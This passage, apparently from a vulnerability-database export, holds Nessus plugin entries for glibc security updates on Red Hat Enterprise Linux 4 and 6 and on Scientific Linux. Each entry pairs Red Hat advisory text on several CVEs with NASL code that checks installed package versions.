value:\"http://www.nessus.org/u?c13b3468\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:nptl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 4.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL4\", reference:\"glibc-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"glibc-common-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"glibc-debuginfo-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"glibc-debuginfo-common-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"glibc-devel-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"glibc-headers-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"glibc-profile-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"glibc-utils-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"nptl-devel-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"nscd-2.3.4-2.57\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:10:23", "description": "Updated glibc packages that fix multiple security issues and one bug\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into\nthe mtab (mounted file systems table) file via certain setuid mount\nhelpers, if the attacker were allowed to mount to an arbitrary\ndirectory under their control. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on\nsufficiently large inputs, it could cause an application using\nfnmatch() to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly\nescaped output as required by the POSIX specification. If an attacker\nwere able to set the locale environment variables in the environment\nof a script that performed shell evaluation on the output of the\nlocale command, and that script were run with different privileges\nthan the attacker's, it could execute arbitrary code with the\nprivileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If\nan attacker supplied a long UTF-8 string to an application linked\nagainst glibc, it could cause the application to crash.\n(CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nThis update also fixes the following bug :\n\n* When using an nscd package that is a different version than the\nglibc package, the nscd service could fail to start. This update makes\nthe nscd package require a specific glibc version to prevent this\nproblem. (BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these\nissues.", "edition": 21, "published": "2012-02-14T00:00:00", "title": "RHEL 4 : glibc (RHSA-2012:0125)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2012-02-14T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:nptl-devel", "p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "p-cpe:/a:redhat:enterprise_linux:glibc-profile", "p-cpe:/a:redhat:enterprise_linux:glibc-headers"], "id": "REDHAT-RHSA-2012-0125.NASL", "href": "https://www.tenable.com/plugins/nessus/57928", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0125. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57928);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0296\", \"CVE-2010-0830\", \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2011-1659\", \"CVE-2011-4609\");\n script_bugtraq_id(40063, 46563, 46740, 47370, 50898, 51439);\n script_xref(name:\"RHSA\", value:\"2012:0125\");\n\n script_name(english:\"RHEL 4 : glibc (RHSA-2012:0125)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix multiple security issues and one bug\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into\nthe mtab (mounted file systems table) file via certain setuid mount\nhelpers, if the attacker were allowed to mount to an arbitrary\ndirectory under their control. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on\nsufficiently large inputs, it could cause an application using\nfnmatch() to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly\nescaped output as required by the POSIX specification. If an attacker\nwere able to set the locale environment variables in the environment\nof a script that performed shell evaluation on the output of the\nlocale command, and that script were run with different privileges\nthan the attacker's, it could execute arbitrary code with the\nprivileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If\nan attacker supplied a long UTF-8 string to an application linked\nagainst glibc, it could cause the application to crash.\n(CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nThis update also fixes the following bug :\n\n* When using an nscd package that is a different version than the\nglibc package, the nscd service could fail to start. This update makes\nthe nscd package require a specific glibc version to prevent this\nproblem. (BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1095\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-0296\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1071\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1659\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1089\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5029\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4609\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-0830\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nptl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0125\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"glibc-2.3.4-2.57\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"glibc-common-2.3.4-2.57\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"glibc-devel-2.3.4-2.57\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"glibc-headers-2.3.4-2.57\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"glibc-profile-2.3.4-2.57\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"glibc-utils-2.3.4-2.57\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"nptl-devel-2.3.4-2.57\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"nscd-2.3.4-2.57\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-profile / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:46:12", "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nThis update also fixes several bugs and adds various enhancements.\n\nUsers are advised to upgrade to these updated glibc packages, which\ncontain backported patches to resolve these issues and add these\nenhancements.", "edition": 24, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : glibc on SL6.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1089", "CVE-2009-5064"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20111206_GLIBC_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61187", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61187);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5064\", \"CVE-2011-1089\");\n\n script_name(english:\"Scientific Linux Security Update : glibc on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nThis update also fixes several bugs and adds various enhancements.\n\nUsers are advised to upgrade to these updated glibc packages, which\ncontain backported patches to resolve these issues and add these\nenhancements.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1112&L=scientific-linux-errata&T=0&P=2038\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?74c276b9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"glibc-2.12-1.47.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-common-2.12-1.47.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-debuginfo-2.12-1.47.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-debuginfo-common-2.12-1.47.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-devel-2.12-1.47.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-headers-2.12-1.47.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-static-2.12-1.47.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-utils-2.12-1.47.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"nscd-2.12-1.47.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:10:04", "description": "Updated glibc packages that fix two security issues, several bugs, and\nadd various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nRed Hat would like to thank Dan Rosenberg for reporting the\nCVE-2011-1089 issue.\n\nThis update also fixes several bugs and adds various enhancements.\nDocumentation for these bug fixes and enhancements will be available\nshortly from the Technical Notes document, linked to in the References\nsection.\n\nUsers are advised to upgrade to these updated glibc packages, which\ncontain backported patches to resolve these issues and add these\nenhancements.", "edition": 29, "published": "2011-12-06T00:00:00", "title": "RHEL 6 : glibc (RHSA-2011:1526)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1089", "CVE-2009-5064"], "modified": "2011-12-06T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc-static", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "id": "REDHAT-RHSA-2011-1526.NASL", "href": "https://www.tenable.com/plugins/nessus/57011", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1526. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57011);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5064\", \"CVE-2011-1089\");\n script_bugtraq_id(46740);\n script_xref(name:\"RHSA\", value:\"2011:1526\");\n\n script_name(english:\"RHEL 6 : glibc (RHSA-2011:1526)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix two security issues, several bugs, and\nadd various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nRed Hat would like to thank Dan Rosenberg for reporting the\nCVE-2011-1089 issue.\n\nThis update also fixes several bugs and adds various enhancements.\nDocumentation for these bug fixes and enhancements will be available\nshortly from the Technical Notes document, linked to in the References\nsection.\n\nUsers are advised to upgrade to these updated glibc packages, which\ncontain backported patches to resolve these issues and add these\nenhancements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1089\"\n );\n # 